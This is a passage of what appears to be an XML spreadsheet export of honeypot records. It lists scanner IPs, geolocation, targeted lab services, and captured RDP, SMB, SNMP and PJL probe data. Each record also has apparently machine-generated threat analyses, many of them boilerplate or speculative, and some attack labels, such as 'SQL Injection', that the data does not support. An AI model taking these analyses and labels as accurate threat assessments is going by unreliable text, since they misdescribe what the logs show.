mstshash=XIbCzP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YXZwSqIyb'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,60492)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,60496)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8428"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible brute-force login attempt to an RDP service using invalid credentials stored in a cookie. This is likely a pre-authentication vulnerability being exploited by the attacker. The use of &quot;mstshash&quot; indicates an attempt to bypass authentication mechanisms. &amp;&amp; Possible brute-force attack against RDP service, attempting to bypass authentication with modified session hash cookie. Malicious actor is likely trying to gain unauthorized access by exploiting the vulnerability in the session handling mechanism. The presence of a modified cookie suggests an attempt to circumvent security controls. &amp;&amp; The log indicates that an RDP service is not available for use, suggesting that it may have been accessed or compromised by malicious actors. The lack of availability could be due to excessive login attempts or potential scanning activities. &amp;&amp; This suggests an attempt to gather system information, possibly for reconnaissance or exploitation purposes, as SNMP is often used for network monitoring but can be exploited to retrieve sensitive data. _x000a_The lack of specific information in the log indicates a potential scanning or probing activity rather than a full-scale attack. _x000a_This may indicate a malicious actor trying to map out the network's infrastructure. &amp;&amp; There is no log data provided, so I have nothing to analyze. _x000a__x000a_However, if you provide some sample log data, I can help explain the possible malicious activity it represents. &amp;&amp; Unknown FTP activity detected, possibly an attempt to connect or scan for vulnerabilities._x000a_No actual data was transferred or accessed over FTP._x000a_This could be a reconnaissance step by a malicious actor. &amp;&amp; A suspicious incoming SMB connection from IP address 147.185.132.40 on port 60492 has been detected._x000a_This could be an attempt to exploit the system for unauthorized access or file transfer._x000a_Possible malicious intent includes spreading malware or executing remote commands. &amp;&amp; An incoming connection from an unknown IP address suggests a potential external attempt to access internal resources. This could be a reconnaissance or exploitation attempt by a malicious entity. The IP address may indicate the source of the attack."/>
    <s v="TLS Auth &amp;&amp; TLS Spoofing &amp;&amp; SMB Scanning &amp;&amp; SMB Attack &amp;&amp; SMB Port Scan"/>
  </r>
  <r>
    <x v="233"/>
    <x v="233"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:41:55"/>
    <d v="2025-04-30T06:41:55"/>
    <d v="2025-04-30T06:41:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:8975"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="234"/>
    <x v="234"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:33:40"/>
    <d v="2024-07-08T14:44:00"/>
    <d v="2025-04-30T06:33:40"/>
    <n v="383"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_RDP_H20&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_LDAP_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;NA&amp;&amp;1080&amp;&amp;110&amp;&amp;49599&amp;&amp;1521&amp;&amp;389&amp;&amp;161&amp;&amp;6379&amp;&amp;143&amp;&amp;445&amp;&amp;3306&amp;&amp;5900&amp;&amp;3389&amp;&amp;55319&amp;&amp;50590&amp;&amp;52328&amp;&amp;9100&amp;&amp;54592&amp;&amp;1433&amp;&amp;23&amp;&amp;21&amp;&amp;80&amp;&amp;8443&amp;&amp;54016&amp;&amp;53725&amp;&amp;55802&amp;&amp;52185&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}"/>
    <n v="105"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fBpFpLiUh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TthruF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iOlDFC'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,62782)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,62790)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,62792)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qBAYkbvQG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CwtYPU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UVyCdh'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ANaaERCxn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jLuatS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CeqSvw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yrClEeaOj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zlZSjn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NvBFxc'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,60808)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,60822)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,59148)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,59160)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,59172)}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,63642)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,63654)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,63660)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ifqNpPIXn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EelYKd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LuNHdn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FeznCUlWj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CFGDmT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TNHFlf'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dnHjjZYIs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mzseEp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JWOQRT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SeciuKgvX'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,61210)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:847e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is likely performing reconnaissance and scanning activities, possibly as a precursor to launching more targeted attacks. They are attempting to identify vulnerabilities and gain access to various services on the network. &amp;&amp; No log data provided. &amp;&amp; An incoming connection from an unknown IP address is attempting to access SMB service, which may be a sign of malicious activity such as unauthorized data transfer or malware spread. This could be an attempt by attackers to exploit the system's shared resources or inject malware. The IP address and port combination indicates a potential security threat. &amp;&amp; An unknown device attempted to connect to SMB service from IP address 147.185.132.126 on port 61210. This could be a brute force login attempt or scanning for vulnerabilities. The device may be trying to exploit or access sensitive data through the SMB connection. &amp;&amp; The system is unable to collect SNMP log data, which may indicate a monitoring issue or a potential security vulnerability allowing malicious activity to go unnoticed. This lack of data could be due to various reasons such as configuration issues or network problems. The absence of SNMP logs might make it difficult to detect suspicious activities. &amp;&amp; Possible malicious activity is attempted unauthorized access via an IMAP service as there are no valid credentials being provided for this connection attempt. The lack of credentials indicates that the attacker is trying to exploit potential vulnerabilities or brute-force a login. This action could be part of a larger phishing or reconnaissance operation. &amp;&amp; The log data indicates suspicious login attempts from unknown IP addresses, likely a brute force attack to gain unauthorized access to the system. These attempts are targeting various services, potentially compromising user credentials and system security. The unknown IP addresses suggest an external threat source attempting unauthorized access. &amp;&amp; This log entry suggests an attempt to exploit a SIP service for malicious purposes, possibly a port scanning or probing activity. The lack of a valid Data_SIP value may indicate an invalid or malformed request. This could be a precursor to further exploitation or reconnaissance. &amp;&amp; The presence of this entry suggests an attempt to access a database service without providing valid credentials, potentially indicating a brute force or unauthorized access attempt._x000a_This can be a precursor to further malicious activities such as data theft or system compromise._x000a_It may also indicate the use of a vulnerability scanner or malicious script trying to exploit weak passwords."/>
    <s v="Password Spraying &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="235"/>
    <x v="235"/>
    <s v="NA&amp;&amp;p1618220-ipxg00g01yosemiya.okinawa.ocn.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-30T06:13:58"/>
    <d v="2025-04-26T18:13:13"/>
    <d v="2025-04-30T06:13:58"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="47"/>
    <s v="Okinawa"/>
    <s v="Naha Shi"/>
    <s v="Naha"/>
    <s v="1856035"/>
    <s v="900-0000"/>
    <s v="26.243"/>
    <s v="127.68"/>
    <s v="4713"/>
    <s v="NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="business"/>
    <s v="Open Computer Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b405:7cdc"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze or explain possible malicious activity. &amp;&amp; No data provided, unable to analyze malicious activity. _x000a_This would typically involve identifying suspicious login attempts or network connections._x000a_It could indicate unauthorized access attempts or malicious scanning of the system. &amp;&amp; No log data available, unable to analyze malicious activity. &amp;&amp; No log data provided, unable to analyze."/>
    <m/>
  </r>
  <r>
    <x v="236"/>
    <x v="236"/>
    <s v="din-190-124-227-77.ipcom.comunitel.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:13:20"/>
    <d v="2023-12-06T10:04:00"/>
    <d v="2025-04-30T06:13:20"/>
    <n v="159"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1918&amp;&amp;23&amp;&amp;NA&amp;&amp;53994"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="CT"/>
    <s v="Catalonia"/>
    <s v="Barcelona"/>
    <s v="Montcada i Reixac"/>
    <s v="3116527"/>
    <s v="08110"/>
    <s v="41.4833"/>
    <s v="2.18333"/>
    <s v="12430"/>
    <s v="VODAFONE ESPANA S.A.U."/>
    <s v="Vodafone Espana S.A.U."/>
    <s v="business"/>
    <s v="Comunitel Global S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4de3:7cbe"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is insufficient log data to analyze for possible malicious activity. _x000a_The log data does not provide any information about potential security threats. _x000a_No indicators of malicious behavior are present. &amp;&amp; No log data provided, cannot analyze activity. _x000a__x000a_However, here's an example of what a brief analysis might look like with some hypothetical log data:_x000a__x000a_Log data: &quot;Unauthorized login attempt from IP 192.168.1.100 at 2022-01-01 12:00:00.&quot;_x000a__x000a_Possible malicious activity is a user trying to access the system without permission from an unknown location. This could be a brute force attack or phishing attempt. The system's security may have been compromised if multiple such attempts are made within a short period."/>
    <m/>
  </r>
  <r>
    <x v="237"/>
    <x v="237"/>
    <s v="p2247031-ipxg00e01kobeminato.hyogo.ocn.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:13:10"/>
    <d v="2025-04-27T06:12:43"/>
    <d v="2025-04-30T06:13:10"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="28"/>
    <s v="Hyōgo"/>
    <s v="Kōbe Shi"/>
    <s v="Kobe"/>
    <s v="1859171"/>
    <s v="650-0007"/>
    <s v="34.6901"/>
    <s v="135.196"/>
    <s v="4713"/>
    <s v="NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="business"/>
    <s v="Open Computer Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:99c8:d81f"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="No analysis can be done without log data."/>
    <m/>
  </r>
  <r>
    <x v="238"/>
    <x v="238"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:12:54"/>
    <d v="2024-07-13T14:08:13"/>
    <d v="2025-04-30T06:12:54"/>
    <n v="150"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;6379&amp;&amp;NA&amp;&amp;56913"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IL"/>
    <s v="Illinois"/>
    <s v="DuPage"/>
    <s v="Lombard"/>
    <s v="4900373"/>
    <s v="60148"/>
    <s v="41.8493"/>
    <s v="-88.0298"/>
    <s v="27411"/>
    <s v="Leaseweb USA, Inc."/>
    <s v="Leaseweb USA, Inc."/>
    <s v="hosting"/>
    <s v="LeaseWeb USA, Inc. Chicago"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,58154)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,56328)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,56425)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,64946)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,65132)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,63869)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51267)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52132)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52172)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,49757)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,49850)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,64653)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,64760)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51778)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51954)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52235)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52311)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51459)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51507)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection 